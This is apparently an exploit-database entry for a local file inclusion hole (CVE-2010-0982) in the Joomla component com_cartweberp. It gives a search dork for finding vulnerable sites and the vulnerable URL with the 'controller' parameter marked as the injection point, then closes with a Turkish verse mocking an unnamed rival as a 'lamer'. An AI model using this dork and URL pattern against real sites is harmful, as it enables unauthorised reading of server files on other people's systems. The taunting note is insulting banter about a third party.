Joomla! Component com_cartweberp - Local File Inclusion

Author: FL0RiX
type: webapps
platform: php
port: 
date_added: 2010-01-02 
date_updated:  
verified: 1 
codes: OSVDB-61447;CVE-2010-0982 
tags: 
aliases:  
screenshot_url:  
application_url: 

@~~=======================================~~@
@~~=Script   : Joomla Component com_cartweberp

@~~=Author   : FL0RiX

@~~=Greez : Deep-Power ,KaCaK,Wretch-x & All Friends

@~~=Bug Type : Local File Inlusion(LFI)

@~~=Dork : inurl:"com_cartweberp"

@~~=======================================~~@

@~~=Vuln

:http://server/ [Yol] /index.php?option=com_cartweberp&controller=[-LFI-]


< ---- Note ---- >
F....N;
Sen çok üstün zekaya sahip birisin,
emin olabilirsin, :)
Sql injection ile domain hackleyebilen tek lamersin, :)
ASP'de Rfi Bulmakta Birebirsin,
Ama Gördügüm En hIyar Lamersin :D
Bu Kafiyelerde Bi TarafIna Girsin ;)
Lol F....N :)
< ---- Note Finished ---- >